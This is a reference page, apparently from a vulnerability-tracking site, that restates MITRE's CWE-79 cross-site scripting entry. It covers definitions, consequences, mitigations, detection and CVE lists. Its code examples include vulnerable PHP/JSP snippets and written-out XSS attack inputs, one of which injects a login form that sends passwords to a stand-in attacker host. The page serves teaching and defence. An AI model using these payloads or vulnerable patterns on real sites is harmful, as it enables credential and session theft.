CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Also known as: XSS, HTML Injection, Reflected XSS / Non-Persistent XSS / Type 1 XSS, Stored XSS / Persistent XSS / Type 2 XSS, DOM-Based XSS / Type 0 XSS
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Last updated
Overview
There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.
Background
The Same Origin Policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce. When referring to XSS, the Domain of a website is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site.
Real-world CVEs
25,980 recorded CVEs are caused by CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')), including 31 in CISA's KEV (Known Exploited Vulnerabilities) catalog. KEVs are shown first. 3,982 new CWE-79 CVEs have been recorded so far in 2026 (7,706 in 2025).
- CVE-2023-34192CISA KEVCritical · CVSS 9.3 · EPSS 100th2023-07-06
- CVE-2019-3929CISA KEVCritical · CVSS 9.3 · EPSS 100th2019-04-30
- CVE-2025-27915CISA KEVHigh · CVSS 8.6 · EPSS 90th2025-03-12
- CVE-2024-11182CISA KEV
Stored XSS vulnerability in MDaemon Email Server
High · CVSS 8.6 · EPSS 97th2024-11-15 - CVE-2020-35730CISA KEVHigh · CVSS 8.6 · EPSS 98th2020-12-28
- CVE-2025-48700CISA KEVHigh · CVSS 8.5 · EPSS 75th2025-06-23
- CVE-2026-42897CISA KEV
Microsoft Exchange Server Spoofing Vulnerability
High · CVSS 8.1 · EPSS 92th2026-05-14 - CVE-2024-43573CISA KEV
Windows MSHTML Platform Spoofing Vulnerability
High · CVSS 7.1 · EPSS 99th2024-10-08 - CVE-2020-11023CISA KEV
Potential XSS vulnerability in jQuery
Medium · CVSS 6.9 · EPSS 100th2020-04-29 - CVE-2019-9978CISA KEVMedium · CVSS 6.9 · EPSS 99th2019-03-24
- CVE-2025-68461CISA KEVMedium · CVSS 6.5 · EPSS 97th2025-12-18
- CVE-2024-27443CISA KEVMedium · CVSS 6.5 · EPSS 97th2024-08-12
Showing 12 of 25,980 recorded CWE-79 CVEs. Track new ones as they are published and get AI-written analysis and fixes.
Monitor CWE-79 vulnerabilitiesCommon consequences
What can happen when CWE-79 is exploited.
Bypass Protection Mechanism, Read Application Data
Affects: Access Control, Confidentiality
The most common attack performed with cross-site scripting involves the disclosure of private information stored in user cookies, such as session information. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity on behalf of the victim to an attacker-controlled system (such as sending all site cookies to a given E-mail address). This could be especially dangerous to the site if the victim has administrator privileges to manage that site. This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also.
Execute Unauthorized Code or Commands
Affects: Integrity, Confidentiality, Availability
In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws, for example, "drive-by hacking."
Execute Unauthorized Code or Commands, Bypass Protection Mechanism, Read Application Data
Affects: Confidentiality, Integrity, Availability, Access Control
The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running "Active X" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.
How it happens
When it is introduced
Typically introduced during these phases of the software lifecycle.
Applies to
Technologies
How to prevent it
Practical mitigations for CWE-79, grouped by where in the lifecycle they apply.
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Parts of the same output document may require different encodings, which will vary depending on whether the output is in the:
etc. Note that HTML Entity Encoding is only appropriate for the HTML body.
Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
- HTML body
- Element attributes (such as src="XYZ")
- URIs
- JavaScript sections
- Cascading Style Sheets and style property
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Effectiveness: Limited — This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc.
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
With Struts, write all data from form beans with the bean's filter attribute set to true.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Effectiveness: Defense in Depth
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.
Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
Effectiveness: Moderate — An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.
When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
How to detect it
Automated Static Analysis
Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.
Effectiveness: Moderate
Black Box
Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses.
Effectiveness: Moderate
Code examples
Illustrative examples from MITRE showing how the weakness appears in code.
The following code displays a welcome message on a web page based on the HTTP GET username parameter (covers a Reflected XSS (Type 1) scenario).
Vulnerable example
$username = $_GET['username'];Attack input
http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script>Attack input
http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div>Resulting query
<div class="header"> Welcome, <div id="stealPassword"> Please Login:Attack input
trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22Attack input
trustedSite.example.com/welcome.php?username=<script+type="text/javascript">The following code displays a Reflected XSS (Type 1) scenario.
Vulnerable example
<% String eid = request.getParameter("eid"); %>Vulnerable example
<%The following code displays a Stored XSS (Type 2) scenario.
Vulnerable example
<%Statement stmt = conn.createStatement();Vulnerable example
<%The following code consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.
Vulnerable example
$username = mysql_real_escape_string($username);Vulnerable example
//Print list of users to page
$query = 'Select * From users Where loggedIn=true';The following code is a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement:
Vulnerable example
//save HTML-formatted message to file; implementation details are irrelevant for this example.
$name = $_COOKIE["myname"];Attack input
<script>document.alert('Hacked');</script>Resulting query
<script>document.alert('Hacked');</script> has logged in.The following code attempts to stop XSS attacks by removing all occurences of "script" in an input string.
Vulnerable example
public String removeScriptTags(String input, String mask) {Because the code only checks for the lower-case "script" string, it can be easily defeated with upper-case script tags.
Illustrative examples
Real CVEs that MITRE cites as examples of this weakness.
- CVE-2021-1879CISA KEV— Universal XSS in mobile operating system, as exploited in the wild per CISA KEV.
- CVE-2020-3580CISA KEV— Chain: improper input validation (CWE-20) in firewall product leads to XSS (CWE-79), as exploited in the wild per CISA KEV.
- CVE-2024-49038 — XSS in AI assistant
- CVE-2024-54142 — Plugin that enables AI features allows input with html entities, leading to XSS
- CVE-2021-25926 — Python Library Manager did not sufficiently neutralize a user-supplied search term, allowing reflected XSS.
- CVE-2021-25963 — Python-based e-commerce platform did not escape returned content on error pages, allowing for reflected Cross-Site Scripting attacks.
- CVE-2014-8958 — Admin GUI allows XSS through cookie.
- CVE-2017-9764 — Web stats program allows XSS through crafted HTTP header.
- CVE-2014-5198 — Web log analysis product allows XSS through crafted HTTP Referer header.
- CVE-2008-5080 — Chain: protection mechanism failure allows XSS
- CVE-2006-4308 — Chain: incomplete denylist (CWE-184) only checks "javascript:" tag, allowing XSS (CWE-79) using other tags
- CVE-2007-5727 — Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79)
- CVE-2008-5770 — Reflected XSS using the PATH_INFO in a URL
- CVE-2008-4730 — Reflected XSS not properly handled when generating an error message
- CVE-2008-5734 — Reflected XSS sent through email message.
- CVE-2008-0971 — Stored XSS in a security product.
- CVE-2008-5249 — Stored XSS using a wiki page.
- CVE-2006-3568 — Stored XSS in a guestbook application.
- CVE-2006-3211 — Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.
- CVE-2006-3295 — Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79).
Terminology & mappings
Alternate terms
- XSS
- A common abbreviation for Cross-Site Scripting.
- HTML Injection
- Used as a synonym of stored (Type 2) XSS.
- Reflected XSS / Non-Persistent XSS / Type 1 XSS
- Used when a server application reads data directly from the HTTP request and reflects it back in the HTTP response.
- Stored XSS / Persistent XSS / Type 2 XSS
- Used when a server-side application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content.
- DOM-Based XSS / Type 0 XSS
- Used when a client-side application performs the injection of XSS into the page by manipulating the Domain Object Model (DOM).
- CSS
- In the early years after initial discovery of XSS, "CSS" was a commonly-used acronym. However, this would cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly.
Mapped taxonomies
- PLOVER: Cross-site scripting (XSS)
- 7 Pernicious Kingdoms: Cross-site Scripting
- CLASP: Cross-site scripting
- OWASP Top Ten 2007: Cross Site Scripting (XSS) (A1) — Exact fit
- OWASP Top Ten 2004: Unvalidated Input (A1) — CWE More Specific fit
- OWASP Top Ten 2004: Cross-Site Scripting (XSS) Flaws (A4) — Exact fit
- WASC: Cross-site Scripting (8)
- Software Fault Patterns: Tainted input to command (SFP24)
- OMG ASCSM (ASCSM-CWE-79)
Attack patterns
CAPEC attack patterns that exploit this weakness.
Frequently asked questions
Common questions about CWE-79.
- What is CWE-79?
- The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- What CVEs are caused by CWE-79?
- 25,980 recorded CVEs are attributed to CWE-79, including CVE-2023-34192, CVE-2019-3929, CVE-2025-27915. 31 are listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
- Is CWE-79 part of the OWASP Top 10?
- CWE-79 maps to OWASP Top Ten 2007: Cross Site Scripting (XSS) (A1) in the OWASP security taxonomy.
- How do you prevent CWE-79?
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- How is CWE-79 detected?
- Automated Static Analysis: Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved.
- What are the consequences of CWE-79?
- Exploiting CWE-79 can lead to: Bypass Protection Mechanism, Read Application Data, Execute Unauthorized Code or Commands.
- Is CWE-79 actively exploited?
- Yes. 31 CWE-79 vulnerabilities are in CISA's KEV catalog of actively exploited flaws, out of 25,980 recorded CVEs.
References
- MITRE CWE definition (CWE-79) (opens in a new tab)
- CWE-79 vulnerabilities on NVD (opens in a new tab)
- Learn: What is a CWE?
Weakness data is sourced from the MITRE CWE catalog (v4.20). CVE associations are aggregated and kept current by RadicalNotion.AI.
Stay ahead of CWE-79
Get alerted the moment a new CWE-79 vulnerability affects your stack, with AI-written analysis, severity context, and remediation guidance.